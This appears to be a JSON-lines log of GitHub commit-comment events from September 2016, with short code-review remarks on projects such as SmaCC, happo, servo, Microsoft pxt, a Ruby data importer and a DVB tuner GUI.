{"id":"4621936455","type":"CommitCommentEvent","actor":{"login":"AdmireTheDistance"},"repo":{"name":"CypherOS/build"},"payload":{"comment":{"id":19184800,"position":null,"line":null,"path":null,"commit_id":"29bfcbbe6270de72c683175e485ea4aa7c21898b","created_at":"2016-09-27T04:39:26Z","updated_at":"2016-09-27T04:39:26Z","body":"How many hours a day do you spend looking for stuff to kang?"}},"created_at":"2016-09-27T04:39:26Z"}
{"id":"4621937219","type":"CommitCommentEvent","actor":{"login":"erinc35"},"repo":{"name":"erinc35/CarDex"},"payload":{"comment":{"id":19184804,"position":null,"line":null,"path":null,"commit_id":"4576c7d67a259d9a13c71d2604fc49e8fca32314","created_at":"2016-09-27T04:39:48Z","updated_at":"2016-09-27T04:39:48Z","body":"@bootcoder"}},"created_at":"2016-09-27T04:39:48Z"}
{"id":"4621938105","type":"CommitCommentEvent","actor":{"login":"ThierryGoubier"},"repo":{"name":"ThierryGoubier/SmaCC"},"payload":{"comment":{"id":19184806,"position":9,"line":25,"path":"SmaCC-Smalltalk-Parser.package/StParser.class/class/definitionComment.st","commit_id":"78442debec83246969050e7308a3261a19c1c6fe","created_at":"2016-09-27T04:40:11Z","updated_at":"2016-09-27T04:40:11Z","body":"\\cA is Character null, or ascii 0. In SmaCC, we can get all the ascii control characters with \\c followed by an uppercase letter. It's in the SmaCC help, in the Scanner page."}},"created_at":"2016-09-27T04:40:11Z"}
{"id":"4621941221","type":"CommitCommentEvent","actor":{"login":"nishand17"},"repo":{"name":"sfhacks/encryption-challenge"},"payload":{"comment":{"id":19184815,"position":null,"line":null,"path":null,"commit_id":"a03e64749d71dd603d2ef053e1648172a04b37e5","created_at":"2016-09-27T04:41:39Z","updated_at":"2016-09-27T04:41:39Z","body":"He died without reason"}},"created_at":"2016-09-27T04:41:39Z"}
{"id":"4621943398","type":"CommitCommentEvent","actor":{"login":"ViX-Sicilian"},"repo":{"name":"openmips/stbgui"},"payload":{"comment":{"id":19184823,"position":null,"line":null,"path":null,"commit_id":"6cfcc0fb119d11844bd38e86b36f2c16cc64c755","created_at":"2016-09-27T04:42:36Z","updated_at":"2016-09-27T04:42:36Z","body":"Gigablue Twin hybrid tuner functions fine with multituner support, only GIGA DVB-C/T2 NIM (SI4768) has an issue, there has to be differences in drivers.\r\n\r\nWith this code, VU+, Xtrend and Dags tuner modules all run fine."}},"created_at":"2016-09-27T04:42:36Z"}
{"id":"4621945380","type":"CommitCommentEvent","actor":{"login":"ThierryGoubier"},"repo":{"name":"ThierryGoubier/SmaCC"},"payload":{"comment":{"id":19184828,"position":23,"line":141,"path":"SmaCC-Smalltalk-Parser.package/StParser.class/class/definitionComment.st","commit_id":"78442debec83246969050e7308a3261a19c1c6fe","created_at":"2016-09-27T04:43:31Z","updated_at":"2016-09-27T04:43:31Z","body":"The first case I saw was a period after a comment at the beginning of a block. Since the code is there, this means a Smalltalk compiler accepted it, so it must be Ok."}},"created_at":"2016-09-27T04:43:31Z"}
{"id":"4621946870","type":"CommitCommentEvent","actor":{"login":"ginop86"},"repo":{"name":"ginop86/Basic-Portfolio"},"payload":{"comment":{"id":19184834,"position":5,"line":36,"path":"index.html","commit_id":"f28f5b6bf16f230ff8fb54861aecc4684cd3db6d","created_at":"2016-09-27T04:44:12Z","updated_at":"2016-09-27T04:44:12Z","body":"This class only described the index.html page but was lacking clarity for the other pages so I decided to change the class that would apply on a broader scale."}},"created_at":"2016-09-27T04:44:12Z"}
{"id":"4621948117","type":"CommitCommentEvent","actor":{"login":"gregstein"},"repo":{"name":"ahmedkaludi/Accelerated-Mobile-Pages"},"payload":{"comment":{"id":19184837,"position":null,"line":null,"path":null,"commit_id":"d1be130cec3de0122dc13a59ff89660c62045b0c","created_at":"2016-09-27T04:44:45Z","updated_at":"2016-09-27T04:44:45Z","body":"OMG! Now this is one hell of feature!! Thank you so much <3"}},"created_at":"2016-09-27T04:44:45Z"}
{"id":"4621948368","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19184839,"position":13,"line":13,"path":"js/src/alignArrays.js","commit_id":"35b44f1941fdfb63681a1088982a4cac4b571215","created_at":"2016-09-27T04:44:54Z","updated_at":"2016-09-27T04:44:54Z","body":"Oh, but that actually causes each array to be a reference to the same array, which is probably why it is so much faster..."}},"created_at":"2016-09-27T04:44:54Z"}
{"id":"4621950766","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19184844,"position":13,"line":13,"path":"js/src/alignArrays.js","commit_id":"35b44f1941fdfb63681a1088982a4cac4b571215","created_at":"2016-09-27T04:45:58Z","updated_at":"2016-09-27T04:45:58Z","body":"Trying out fill on the placeholders function below, it seems to be maybe a little faster."}},"created_at":"2016-09-27T04:45:58Z"}
{"id":"4621951805","type":"CommitCommentEvent","actor":{"login":"Fishrock123"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19184847,"position":null,"line":null,"path":null,"commit_id":"4f55158587ab2b701c11085bd39c57d9edb3ea94","created_at":"2016-09-27T04:46:27Z","updated_at":"2016-09-27T04:46:27Z","body":"Timers are optimized to use shared resources \"under the hood\"."}},"created_at":"2016-09-27T04:46:27Z"}
{"id":"4621954708","type":"CommitCommentEvent","actor":{"login":"AbaddonL4G"},"repo":{"name":"Looking4Group/L4G_Core"},"payload":{"comment":{"id":19184870,"position":null,"line":null,"path":null,"commit_id":"442fbf019f5bb7c68fc85f4bacbcba0b8b1dd24c","created_at":"2016-09-27T04:47:51Z","updated_at":"2016-09-27T04:47:51Z","body":"I think 10would be fine. Maybe even higher cd. Dunno what happens to performance if players spam command every 3secs"}},"created_at":"2016-09-27T04:47:51Z"}
{"id":"4621955285","type":"CommitCommentEvent","actor":{"login":"epureum"},"repo":{"name":"obscenesensi/STORAGE-project"},"payload":{"comment":{"id":19184872,"position":null,"line":null,"path":null,"commit_id":"f37f14fc601b18caa31ceceff27b708ae032aee5","created_at":"2016-09-27T04:48:07Z","updated_at":"2016-09-27T04:48:07Z","body":"기본 factorial 사용 코드"}},"created_at":"2016-09-27T04:48:07Z"}
{"id":"4621956200","type":"CommitCommentEvent","actor":{"login":"Frankieshoop90"},"repo":{"name":"piwik/piwik-sdk-android"},"payload":{"comment":{"id":19184875,"position":10,"line":18,"path":"README.md","commit_id":"ae9fb258c47552b1a6dba3aab2137b201ba9573f","created_at":"2016-09-27T04:48:29Z","updated_at":"2016-09-27T04:48:29Z","body":"Fixed"}},"created_at":"2016-09-27T04:48:29Z"}
{"id":"4621957308","type":"CommitCommentEvent","actor":{"login":"acjueves"},"repo":{"name":"acjueves/APC_webprog_mi153_test_repo_acjueves"},"payload":{"comment":{"id":19184879,"position":2,"line":2,"path":"myfile.txt","commit_id":"92deeb98e6d9fcb3e4b5fa21ed9213efc2c220d9","created_at":"2016-09-27T04:48:59Z","updated_at":"2016-09-27T04:48:59Z","body":"hello po"}},"created_at":"2016-09-27T04:48:59Z"}
{"id":"4621957475","type":"CommitCommentEvent","actor":{"login":"donkirkby"},"repo":{"name":"donkirkby/pinyincushion"},"payload":{"comment":{"id":19184880,"position":1,"line":13,"path":"public/client.jsx","commit_id":"d3682b9a5f83ea711492dbdc709a1824a1f0e435","created_at":"2016-09-27T04:49:03Z","updated_at":"2016-09-27T04:49:03Z","body":"This is an example comment on a commit. You can add it on GitHub after doing the commit through HyperDev."}},"created_at":"2016-09-27T04:49:03Z"}
{"id":"4621959156","type":"CommitCommentEvent","actor":{"login":"donkirkby"},"repo":{"name":"donkirkby/pinyincushion"},"payload":{"comment":{"id":19184883,"position":null,"line":null,"path":null,"commit_id":"d3682b9a5f83ea711492dbdc709a1824a1f0e435","created_at":"2016-09-27T04:49:48Z","updated_at":"2016-09-27T04:49:48Z","body":"This is a comment on the whole commit, instead of on a particular line."}},"created_at":"2016-09-27T04:49:48Z"}
{"id":"4621960728","type":"CommitCommentEvent","actor":{"login":"TheAncientGoat"},"repo":{"name":"TheAncientGoat/gatsby"},"payload":{"comment":{"id":19184886,"position":4,"line":5,"path":"lib/utils/web-entry.js","commit_id":"376888654b64a9f45bdd69571e2b7bb32d85d333","created_at":"2016-09-27T04:50:26Z","updated_at":"2016-09-27T04:50:26Z","body":"Results in undefined as the react-hot-loader module is a sourcemap wrapper function for some reason"}},"created_at":"2016-09-27T04:50:26Z"}
{"id":"4621961288","type":"CommitCommentEvent","actor":{"login":"Dabug123"},"repo":{"name":"CypherOS/build"},"payload":{"comment":{"id":19184890,"position":null,"line":null,"path":null,"commit_id":"29bfcbbe6270de72c683175e485ea4aa7c21898b","created_at":"2016-09-27T04:50:42Z","updated_at":"2016-09-27T04:50:42Z","body":"Why not fork it"}},"created_at":"2016-09-27T04:50:42Z"}
{"id":"4621961827","type":"CommitCommentEvent","actor":{"login":"zyxue"},"repo":{"name":"donkirkby/pinyincushion"},"payload":{"comment":{"id":19184893,"position":null,"line":null,"path":null,"commit_id":"d3682b9a5f83ea711492dbdc709a1824a1f0e435","created_at":"2016-09-27T04:50:57Z","updated_at":"2016-09-27T04:50:57Z","body":"Is it the same as a commit message?"}},"created_at":"2016-09-27T04:50:57Z"}
{"id":"4621962174","type":"CommitCommentEvent","actor":{"login":"pelikhan"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":19184895,"position":4,"line":70,"path":"webapp/public/index.html","commit_id":"e5b8633c8669360487bcfb0f73829e47d1cf2d71","created_at":"2016-09-27T04:51:06Z","updated_at":"2016-09-27T04:51:06Z","body":"why moving those files around?"}},"created_at":"2016-09-27T04:51:06Z"}
{"id":"4621963168","type":"CommitCommentEvent","actor":{"login":"ahmedkaludi"},"repo":{"name":"ahmedkaludi/Accelerated-Mobile-Pages"},"payload":{"comment":{"id":19184898,"position":null,"line":null,"path":null,"commit_id":"d1be130cec3de0122dc13a59ff89660c62045b0c","created_at":"2016-09-27T04:51:31Z","updated_at":"2016-09-27T04:51:31Z","body":"@gregstein Thanks :) The update hasn't been pushed officially. This is still in the beta, it will out by today."}},"created_at":"2016-09-27T04:51:31Z"}
{"id":"4621964408","type":"CommitCommentEvent","actor":{"login":"zyxue"},"repo":{"name":"donkirkby/pinyincushion"},"payload":{"comment":{"id":19184901,"position":null,"line":null,"path":null,"commit_id":"d3682b9a5f83ea711492dbdc709a1824a1f0e435","created_at":"2016-09-27T04:52:01Z","updated_at":"2016-09-27T04:52:01Z","body":"The commit messages seems to be always `Updated at hyperdev.com`, am I right?"}},"created_at":"2016-09-27T04:52:01Z"}
{"id":"4621964583","type":"CommitCommentEvent","actor":{"login":"pelikhan"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":19184902,"position":50,"line":913,"path":"webapp/src/app.tsx","commit_id":"e5b8633c8669360487bcfb0f73829e47d1cf2d71","created_at":"2016-09-27T04:52:06Z","updated_at":"2016-09-27T04:52:06Z","body":"you can use regex.replace(...) to achieve the same effect."}},"created_at":"2016-09-27T04:52:06Z"}
{"id":"4621965316","type":"CommitCommentEvent","actor":{"login":"donkirkby"},"repo":{"name":"donkirkby/pinyincushion"},"payload":{"comment":{"id":19184904,"position":null,"line":null,"path":null,"commit_id":"d3682b9a5f83ea711492dbdc709a1824a1f0e435","created_at":"2016-09-27T04:52:25Z","updated_at":"2016-09-27T04:52:25Z","body":"No, it isn't the same as a commit message. It's a special feature added by GitHub for code review. You can't see it in your regular git client."}},"created_at":"2016-09-27T04:52:25Z"}
{"id":"4621967572","type":"CommitCommentEvent","actor":{"login":"ViX-Sicilian"},"repo":{"name":"openmips/stbgui"},"payload":{"comment":{"id":19184910,"position":null,"line":null,"path":null,"commit_id":"6cfcc0fb119d11844bd38e86b36f2c16cc64c755","created_at":"2016-09-27T04:53:31Z","updated_at":"2016-09-27T04:53:31Z","body":"@ arn354, why is the tuner reporting as DVB-C2 if it's not capable of C2. This could be the reason why we are having issues with OpenViX and only this tuner module. When this tuner was first released it was actually being marketed as C2/T/T2, now only C2.\r\n\r\nNIM Socket 3:\r\nType: DVB-C2\r\nName: GIGA DVB-C/T2 NIM (SI4768)\r\nHas_Outputs: yes\r\nFrontend_Device: 3\r\nMode 0:DVB-C\r\nMode 1:DVB-T2\r\nI2C_Device: 3"}},"created_at":"2016-09-27T04:53:31Z"}
{"id":"4621968184","type":"CommitCommentEvent","actor":{"login":"pelikhan"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":19184914,"position":68,"line":344,"path":"webapp/src/blocks.tsx","commit_id":"e5b8633c8669360487bcfb0f73829e47d1cf2d71","created_at":"2016-09-27T04:53:49Z","updated_at":"2016-09-27T04:53:49Z","body":"why is the runner involved?"}},"created_at":"2016-09-27T04:53:49Z"}
{"id":"4621969164","type":"CommitCommentEvent","actor":{"login":"pelikhan"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":19184919,"position":72,"line":348,"path":"webapp/src/blocks.tsx","commit_id":"e5b8633c8669360487bcfb0f73829e47d1cf2d71","created_at":"2016-09-27T04:54:17Z","updated_at":"2016-09-27T04:54:17Z","body":"we have a Map type => Map<number>"}},"created_at":"2016-09-27T04:54:17Z"}
{"id":"4621977176","type":"CommitCommentEvent","actor":{"login":"gohilumesh"},"repo":{"name":"preboot/angular2-webpack"},"payload":{"comment":{"id":19184954,"position":null,"line":null,"path":null,"commit_id":"c668fc32e25b792d09e280833086948d22cac864","created_at":"2016-09-27T04:57:57Z","updated_at":"2016-09-27T04:57:57Z","body":"I removed from tsconfig.json file and atom started complaining that \r\n\"describe\", \"it\" \"beforeEach\" ... not resolved. \r\nCan i keep it ? Is there any other fix?"}},"created_at":"2016-09-27T04:57:57Z"}
{"id":"4621978736","type":"CommitCommentEvent","actor":{"login":"birtles"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":19184959,"position":99,"line":397,"path":"components/style/properties/properties.mako.rs","commit_id":"51e642e875ea25502b92967358e32a30e06ab3dd","created_at":"2016-09-27T04:58:38Z","updated_at":"2016-09-27T04:58:38Z","body":"Thanks @craftytrickster. I can't really imagine how `color: var(--abc)` and `color:var(--abc)` could differ in behavior but maybe @SimonSapin knows of some case where they can. We'll just have to work around this for now."}},"created_at":"2016-09-27T04:58:38Z"}
{"id":"4621985671","type":"CommitCommentEvent","actor":{"login":"martinthomson"},"repo":{"name":"ietf-wg-acme/acme"},"payload":{"comment":{"id":19184982,"position":null,"line":null,"path":null,"commit_id":"5cd66da5d71c5ab45820c9b20c2dbd192abbc8dc","created_at":"2016-09-27T05:01:29Z","updated_at":"2016-09-27T05:01:29Z","body":"should not or SHOULD NOT?"}},"created_at":"2016-09-27T05:01:29Z"}
{"id":"4621989323","type":"CommitCommentEvent","actor":{"login":"jparkSF"},"repo":{"name":"jparkSF/fgsf_contacts"},"payload":{"comment":{"id":19184993,"position":4,"line":18,"path":".gitignore","commit_id":"35ae4dde1e1f64ac831ae62d2f094327ab433142","created_at":"2016-09-27T05:03:12Z","updated_at":"2016-09-27T05:03:12Z","body":"I don't quite understand what this code does, and blocking what kind of picture uploads?"}},"created_at":"2016-09-27T05:03:12Z"}
{"id":"4621990127","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"openmips/stbgui"},"payload":{"comment":{"id":19184995,"position":null,"line":null,"path":null,"commit_id":"6cfcc0fb119d11844bd38e86b36f2c16cc64c755","created_at":"2016-09-27T05:03:32Z","updated_at":"2016-09-27T05:03:32Z","body":"tuner report dvb-c not c2  so all fine atv use dvb-api to check tuner type and not proc\r\n\r\nroot@gbquadplus:~# dvb-fe-tool -f 3\r\nDevice GIGA DVB-C/T2 NIM (SI4768) (/dev/dvb/adapter0/frontend3) capabilities:\r\nCAN_2G_MODULATION\r\nCAN_BANDWIDTH_AUTO\r\nCAN_FEC_1_2\r\nCAN_FEC_2_3\r\nCAN_FEC_3_4\r\nCAN_FEC_5_6\r\nCAN_FEC_7_8\r\nCAN_FEC_AUTO\r\nCAN_GUARD_INTERVAL_AUTO\r\nCAN_HIERARCHY_AUTO\r\nCAN_INVERSION_AUTO\r\nCAN_QAM_16\r\nCAN_QAM_32\r\nCAN_QAM_64\r\nCAN_QAM_128\r\nCAN_QAM_256\r\nCAN_QAM_AUTO\r\nCAN_QPSK\r\nCAN_RECOVER\r\nCAN_TRANSMISSION_MODE_AUTO\r\nDVB API Version 5.10, Current v5 delivery system: DVBT\r\n**Supported delivery systems:\r\nDVBC/ANNEX_A\r\n[DVBT]\r\nDVBT2**"}},"created_at":"2016-09-27T05:03:32Z"}
{"id":"4621991901","type":"CommitCommentEvent","actor":{"login":"estebanms"},"repo":{"name":"ejedigitalcr/people-lookup-cr"},"payload":{"comment":{"id":19185002,"position":5,"line":46,"path":"app/services/data_importer.rb","commit_id":"9f2a781b4a1646f5c3f2fd3ef0f99343e73a77df","created_at":"2016-09-27T05:04:22Z","updated_at":"2016-09-27T05:04:22Z","body":"Use el parámetro `file_path` en lugar de la constante `ZIP_FILE_PATH`. En nuestro caso es lo mismo, pero deja el código más flexible."}},"created_at":"2016-09-27T05:04:22Z"}
{"id":"4621992985","type":"CommitCommentEvent","actor":{"login":"estebanms"},"repo":{"name":"ejedigitalcr/people-lookup-cr"},"payload":{"comment":{"id":19185010,"position":11,"line":52,"path":"app/services/data_importer.rb","commit_id":"9f2a781b4a1646f5c3f2fd3ef0f99343e73a77df","created_at":"2016-09-27T05:04:54Z","updated_at":"2016-09-27T05:04:54Z","body":"Revise la identación en este bloque"}},"created_at":"2016-09-27T05:04:54Z"}
{"id":"4621996791","type":"CommitCommentEvent","actor":{"login":"estebanms"},"repo":{"name":"ejedigitalcr/people-lookup-cr"},"payload":{"comment":{"id":19185030,"position":21,"line":61,"path":"app/services/data_importer.rb","commit_id":"9f2a781b4a1646f5c3f2fd3ef0f99343e73a77df","created_at":"2016-09-27T05:06:35Z","updated_at":"2016-09-27T05:06:35Z","body":"Los comentarios `# TODO` hay que quitarlos cuando ya no aplican, o si quiere los puede dejar pero como comentarios del código que implementó."}},"created_at":"2016-09-27T05:06:35Z"}
{"id":"4621998431","type":"CommitCommentEvent","actor":{"login":"Serneum"},"repo":{"name":"ElixirCLE/nemestats_client"},"payload":{"comment":{"id":19185048,"position":15,"line":11,"path":"lib/nemestats_client.ex","commit_id":"929e9347d453a02a68ae1c27454d93ad3e3d5f79","created_at":"2016-09-27T05:07:19Z","updated_at":"2016-09-27T05:07:19Z","body":"This may cause problems. It looks like we're potentially getting back UTF-16 characters in the authentication token: `>\\n¾A—Aÿ˜‚{`éâbíÒ^þ§á`. Doesn't seem to be an issue if we set `preserveExistingAuthenticationToken` to `false`"}},"created_at":"2016-09-27T05:07:19Z"}
{"id":"4622000465","type":"CommitCommentEvent","actor":{"login":"estebanms"},"repo":{"name":"ejedigitalcr/people-lookup-cr"},"payload":{"comment":{"id":19185056,"position":36,"line":76,"path":"app/services/data_importer.rb","commit_id":"9f2a781b4a1646f5c3f2fd3ef0f99343e73a77df","created_at":"2016-09-27T05:08:12Z","updated_at":"2016-09-27T05:08:12Z","body":"Si no me equivoco todo este método se puede hacer simplemente con estas líneas:\r\n```\r\nfile = ::File.new(DIGEST_FILE_PATH, \"w\")\r\nfile.write(digest)\r\nfile.close\r\n```\r\n\r\nEsto porque el modo \"w\" para abrir el archivo sobreescribe el contenido del archivo existente."}},"created_at":"2016-09-27T05:08:12Z"}
{"id":"4622014872","type":"CommitCommentEvent","actor":{"login":"ynghyn"},"repo":{"name":"jparkSF/fgsf_contacts"},"payload":{"comment":{"id":19185105,"position":4,"line":18,"path":".gitignore","commit_id":"35ae4dde1e1f64ac831ae62d2f094327ab433142","created_at":"2016-09-27T05:14:28Z","updated_at":"2016-09-27T05:14:28Z","body":"- https://github.com/thoughtbot/paperclip#understanding-storage\r\nPaperclip gem saves uploaded files under `public/system` directory (ie: `public/system/contacts/023/my_pic.png`). By committing and pushing image files onto Github, we're essentially sharing our uploaded pictures with whomever that pulls our repo. Placing this directory under `.gitignore` file will make git blind to any file changes within the directory."}},"created_at":"2016-09-27T05:14:28Z"}
{"id":"4622016019","type":"CommitCommentEvent","actor":{"login":"Serneum"},"repo":{"name":"ElixirCLE/nemestats_client"},"payload":{"comment":{"id":19185109,"position":15,"line":11,"path":"lib/nemestats_client.ex","commit_id":"929e9347d453a02a68ae1c27454d93ad3e3d5f79","created_at":"2016-09-27T05:14:58Z","updated_at":"2016-09-27T05:14:58Z","body":"Looks like it breaks when testing in Apiary as well:\r\n<img width=\"657\" alt=\"screen shot 2016-09-27 at 1 14 11 am\" src=\"https://cloud.githubusercontent.com/assets/1091716/18860952/c77f675e-844f-11e6-99ae-4a76d4976fc9.png\">\r\n"}},"created_at":"2016-09-27T05:14:58Z"}
{"id":"4622017906","type":"CommitCommentEvent","actor":{"login":"FineTralfazz"},"repo":{"name":"robotmoose/robotmoose"},"payload":{"comment":{"id":19185115,"position":null,"line":null,"path":null,"commit_id":"a03111ef9b9050a9ae1fd3fa8f25d6f28e042c24","created_at":"2016-09-27T05:15:50Z","updated_at":"2016-09-27T05:15:50Z","body":"This actually closes #154, not #153."}},"created_at":"2016-09-27T05:15:50Z"}
{"id":"4622018966","type":"CommitCommentEvent","actor":{"login":"hsutter"},"repo":{"name":"hsutter/gcpp"},"payload":{"comment":{"id":19185120,"position":null,"line":null,"path":null,"commit_id":"2fc4c8d487fc9863951788d2d3938c8a89e06c84","created_at":"2016-09-27T05:16:18Z","updated_at":"2016-09-27T05:16:18Z","body":"\"Well, inn't that _special_?\"\r\n\r\nThanks for the info."}},"created_at":"2016-09-27T05:16:18Z"}
{"id":"4622019501","type":"CommitCommentEvent","actor":{"login":"codito"},"repo":{"name":"codito/cli"},"payload":{"comment":{"id":19185122,"position":4,"line":23,"path":"resources/MSBuildImports/15.0/Microsoft.Common.targets/ImportAfter/Microsoft.NuGet.ImportAfter.targets","commit_id":"4a701b751abfd8522a8d56bf819c71bebd240f7f","created_at":"2016-09-27T05:16:31Z","updated_at":"2016-09-27T05:16:31Z","body":"Move another targets"}},"created_at":"2016-09-27T05:16:31Z"}
{"id":"4622022013","type":"CommitCommentEvent","actor":{"login":"Iyouboushi"},"repo":{"name":"Iyouboushi/mIRC-BattleArena"},"payload":{"comment":{"id":19185141,"position":null,"line":null,"path":null,"commit_id":"fc32ddd44cf2005be2571082050f8e8ee2e2ef04","created_at":"2016-09-27T05:17:38Z","updated_at":"2016-09-27T05:17:38Z","body":"All dragons are \"weak\" to their own element because they're healed by their own element.  So all of them should have their corresponding element set to 500 on the modifier."}},"created_at":"2016-09-27T05:17:38Z"}
{"id":"4622022646","type":"CommitCommentEvent","actor":{"login":"estebanms"},"repo":{"name":"ejedigitalcr/people-lookup-cr"},"payload":{"comment":{"id":19185145,"position":48,"line":159,"path":"app/services/data_importer.rb","commit_id":"9f2a781b4a1646f5c3f2fd3ef0f99343e73a77df","created_at":"2016-09-27T05:17:57Z","updated_at":"2016-09-27T05:17:57Z","body":"Esto no es muy recomendado, ya que puede cambiar el valor original de la variable que se pasó como parámetro, y eso en algunos contextos es peligroso. Es mejor usar la versión sin el ! (`value.strip.split.map...`)"}},"created_at":"2016-09-27T05:17:57Z"}
{"id":"4622022692","type":"CommitCommentEvent","actor":{"login":"trotzig"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19185146,"position":62,"line":62,"path":"js/src/alignArrays.js","commit_id":"4d26d9188148eafe32f461e36f7e64b01be28e27","created_at":"2016-09-27T05:17:58Z","updated_at":"2016-09-27T05:17:58Z","body":"It's funny how this even worked. It's fixed now."}},"created_at":"2016-09-27T05:17:58Z"}
{"id":"4622024137","type":"CommitCommentEvent","actor":{"login":"trotzig"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19185149,"position":65,"line":65,"path":"js/src/alignArrays.js","commit_id":"4d26d9188148eafe32f461e36f7e64b01be28e27","created_at":"2016-09-27T05:18:39Z","updated_at":"2016-09-27T05:18:39Z","body":"I made a change that does less splicing. I think we should explore building a new array instead of splicing though."}},"created_at":"2016-09-27T05:18:39Z"}
{"id":"4622024408","type":"CommitCommentEvent","actor":{"login":"Adam1609"},"repo":{"name":"NL-4-DEVS/PocketRPG"},"payload":{"comment":{"id":19185150,"position":null,"line":null,"path":null,"commit_id":"18bdc1a5dd68dfcb83dad47450ef767c4945872b","created_at":"2016-09-27T05:18:46Z","updated_at":"2016-09-27T05:18:46Z","body":"This is perfect, I have been waiting for so long now :)))"}},"created_at":"2016-09-27T05:18:46Z"}
{"id":"4622024545","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"iTXTech/SynapseAPI"},"payload":{"comment":{"id":19185151,"position":null,"line":null,"path":null,"commit_id":"38f0b7a300b905f790c6ef13ba9aff0438da68f4","created_at":"2016-09-27T05:18:50Z","updated_at":"2016-09-27T05:18:50Z","body":"Can it be disabled? "}},"created_at":"2016-09-27T05:18:50Z"}
{"id":"4622024780","type":"CommitCommentEvent","actor":{"login":"Serneum"},"repo":{"name":"ElixirCLE/nemestats_client"},"payload":{"comment":{"id":19185154,"position":15,"line":11,"path":"lib/nemestats_client.ex","commit_id":"929e9347d453a02a68ae1c27454d93ad3e3d5f79","created_at":"2016-09-27T05:18:57Z","updated_at":"2016-09-27T05:18:57Z","body":"I created [an issue](https://github.com/NemeStats/NemeStats/issues/503)"}},"created_at":"2016-09-27T05:18:57Z"}
{"id":"4622024791","type":"CommitCommentEvent","actor":{"login":"estebanms"},"repo":{"name":"ejedigitalcr/people-lookup-cr"},"payload":{"comment":{"id":19185155,"position":49,"line":160,"path":"app/services/data_importer.rb","commit_id":"9f2a781b4a1646f5c3f2fd3ef0f99343e73a77df","created_at":"2016-09-27T05:18:57Z","updated_at":"2016-09-27T05:18:57Z","body":"Aunque el `*` funciona bien, yo prefiero usar `join(' ')`, ya que es un poco más claro"}},"created_at":"2016-09-27T05:18:57Z"}
{"id":"4622025340","type":"CommitCommentEvent","actor":{"login":"trotzig"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19185156,"position":11,"line":11,"path":"js/src/alignArrays.js","commit_id":"4d26d9188148eafe32f461e36f7e64b01be28e27","created_at":"2016-09-27T05:19:13Z","updated_at":"2016-09-27T05:19:13Z","body":":+1:"}},"created_at":"2016-09-27T05:19:13Z"}
{"id":"4622025358","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19185157,"position":62,"line":62,"path":"js/src/alignArrays.js","commit_id":"4d26d9188148eafe32f461e36f7e64b01be28e27","created_at":"2016-09-27T05:19:14Z","updated_at":"2016-09-27T05:19:14Z","body":"Yeah! I was surprised."}},"created_at":"2016-09-27T05:19:14Z"}
{"id":"4622025618","type":"CommitCommentEvent","actor":{"login":"estebanms"},"repo":{"name":"ejedigitalcr/people-lookup-cr"},"payload":{"comment":{"id":19185160,"position":6,"line":5,"path":"lib/tasks/data.rake","commit_id":"9f2a781b4a1646f5c3f2fd3ef0f99343e73a77df","created_at":"2016-09-27T05:19:20Z","updated_at":"2016-09-27T05:19:20Z","body":"Revertir este cambio si no se va a usar"}},"created_at":"2016-09-27T05:19:20Z"}
{"id":"4622026941","type":"CommitCommentEvent","actor":{"login":"mikken"},"repo":{"name":"Librevault/librevault"},"payload":{"comment":{"id":19185169,"position":null,"line":null,"path":null,"commit_id":"361a66619e6d6018afc24c60a7a03185737b06b9","created_at":"2016-09-27T05:19:56Z","updated_at":"2016-09-27T05:19:56Z","body":"This fix didn't work for me. \r\nOutput after Ctrl-C in terminal:\r\n```\r\n[2016-09-27 08:14:07.155800] [T:18765] [I] Exiting...\r\n[2016-09-27 08:14:07.157439] [T:18765] [I] [MLDHTDiscovery] Saving 152 nodes to session file\r\n```\r\n\r\nAfter second Ctrl-C it exits without any output."}},"created_at":"2016-09-27T05:19:56Z"}
{"id":"4622027144","type":"CommitCommentEvent","actor":{"login":"uxmal"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19185170,"position":4,"line":124,"path":"src/Drivers/reko.config","commit_id":"048fd2c77498e729dbe206876e9324cec92bd94e","created_at":"2016-09-27T05:20:01Z","updated_at":"2016-09-27T05:20:01Z","body":"Yes, not sure how that made it past the regression tests. You can delete that line."}},"created_at":"2016-09-27T05:20:01Z"}
{"id":"4622027438","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19185171,"position":65,"line":65,"path":"js/src/alignArrays.js","commit_id":"4d26d9188148eafe32f461e36f7e64b01be28e27","created_at":"2016-09-27T05:20:09Z","updated_at":"2016-09-27T05:20:09Z","body":"Yeah, I think that might help. Although we don't do too much splicing anymore, so not sure how much it will help."}},"created_at":"2016-09-27T05:20:09Z"}
{"id":"4622030254","type":"CommitCommentEvent","actor":{"login":"Sandertv"},"repo":{"name":"NL-4-DEVS/PocketRPG"},"payload":{"comment":{"id":19185181,"position":null,"line":null,"path":null,"commit_id":"18bdc1a5dd68dfcb83dad47450ef767c4945872b","created_at":"2016-09-27T05:21:23Z","updated_at":"2016-09-27T05:21:23Z","body":"Lol I didn't want to create too many files but you're right, you should be able to change it through FTP :))"}},"created_at":"2016-09-27T05:21:23Z"}
{"id":"4622034246","type":"CommitCommentEvent","actor":{"login":"benladen"},"repo":{"name":"xingxueke/skPakTool"},"payload":{"comment":{"id":19185196,"position":null,"line":null,"path":null,"commit_id":"6d4b822f8b2494d342d66c6d4ac8c1de43d618fc","created_at":"2016-09-27T05:23:05Z","updated_at":"2016-09-27T05:23:05Z","body":"你好，能写个pack回去的程序吗，我学着做个汉化的铲子骑士"}},"created_at":"2016-09-27T05:23:05Z"}
